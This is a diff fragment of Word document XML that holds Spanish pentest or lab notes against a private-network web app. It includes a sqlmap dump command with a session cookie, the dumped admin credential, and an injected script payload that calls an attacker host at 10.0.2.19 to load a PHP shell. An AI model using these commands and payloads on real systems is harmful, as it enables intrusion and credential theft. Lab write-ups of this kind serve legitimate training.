+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>sqlmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -u "http://10.0.2.21/admin/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>edit.php?id</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">=3" --cookie="PHPSESSID=s95hmsjfevcfa8njed8603q3c4" --dump </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>–</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>batch</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>INTERESENTES:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>levantes:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Inyección SQL Identificada:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Parámetro Vulnerable:</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> id en la URL http://10.0.2.21/admin/edit.php?id=3.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Tipos de Inyección:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Boolean-based</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>blind</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Time-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>based</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>blind</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>UNION query</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Base de Datos Identificada:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Nombre de la Base de Datos:</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> blog</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Tablas Identificadas:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>comments</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>posts</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>users</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Contenido de la Tabla users:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Usuario admin con la contraseña P4ssw0rd (MD5 hash: 8efe310f9ab3efeae8d410a8e0166eb2)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">Posibles Scripts para RCE en la Tabla </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>comments</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Varias entradas en la tabla </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>comments</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> contienen scripts que pueden usarse para cargar una </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>shell</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> PHP en el servidor.</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>EJECUTO SCRIPT DE PYTHON BUSCANDO ALGO EN LAS PRIMERAS ID DE LA WEB Y NADA</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>&lt;script&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  // Crear un objeto </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>XMLHttpRequest</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>var</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>xhr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = new </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>XMLHttpRequest</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  // Configurar la solicitud HTTP</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>xhr.open</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>('GET', 'http://10.0.2.19:1234/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>shell.php</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>', true);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>// Enviar la solicitud</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>xhr.send</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>();</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>&lt;/script&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C0AE8A9" wp14:editId="0F4EC646">
+            <wp:extent cx="5400040" cy="3460750"/>
+            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
+            <wp:docPr id="1308055731" name="Imagen 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1308055731" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId11"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5400040" cy="3460750"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">SCRIPT MEJORADO CON MAS FUNCIONES QUE PERMITAN LA EJECUCION DE </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>CODIGO ,</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Y UN SHELL YAB MEJORADO</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="097A23B1" wp14:editId="42360093">
+            <wp:extent cx="5400040" cy="3701415"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="319860322" name="Imagen 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="319860322" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId12"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5400040" cy="3701415"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>SHELL</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0A32CD6D" wp14:editId="536D2C2F">
+            <wp:extent cx="3674225" cy="1738946"/>
+            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
+            <wp:docPr id="344661129" name="Imagen 1"/>
